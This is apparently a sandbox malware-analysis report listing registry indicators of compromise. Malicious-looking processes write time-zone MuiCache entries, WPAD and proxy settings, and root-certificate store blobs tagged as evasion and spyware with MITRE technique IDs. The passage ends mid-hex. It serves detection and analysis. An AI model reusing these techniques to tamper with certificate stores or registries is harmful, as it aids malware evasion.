Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client"	wmiprvse.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-552 = "North Asia Standard Time"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\5a-37-ff-ff-38-bd\WpadDecisionReason = "1"	jhxefMU.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-742 = "New Zealand Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	jhxefMU.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-422 = "Russian Standard Time"	windefender.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\5a-37-ff-ff-38-bd\WpadDecisionTime = 30524cf78a50da01	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP"	wmiprvse.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-222 = "Alaskan Standard Time"	windefender.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\5a-37-ff-ff-38-bd\WpadDecisionTime = 30524cf78a50da01	jhxefMU.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-651 = "AUS Central Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-21 = "Cape Verde Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-111 = "Eastern Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-382 = "South Africa Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-452 = "Caucasus Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-51 = "Greenland Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-451 = "Caucasus Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-632 = "Tokyo Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-772 = "Montevideo Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-832 = "SA Eastern Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client"	wmiprvse.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	jhxefMU.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Key created	\REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session	wmiprvse.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-831 = "SA Eastern Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-281 = "Central Europe Daylight Time"	windefender.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	jhxefMU.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-721 = "Central Pacific Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1412 = "Syria Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-131 = "US Eastern Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	jhxefMU.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-301 = "Romance Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-42 = "E. South America Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-791 = "SA Western Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time"	gHQRn2JTYFpWYGG8K9d0kIVI.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time"	gHQRn2JTYFpWYGG8K9d0kIVI.exe

Modifies system certificate store 2 TTPs 16 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	iLydDdjWvTZucBdjqpLlYCDX.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	csrss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	file.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	file.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	file.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b80f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	iLydDdjWvTZucBdjqpLlYCDX.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e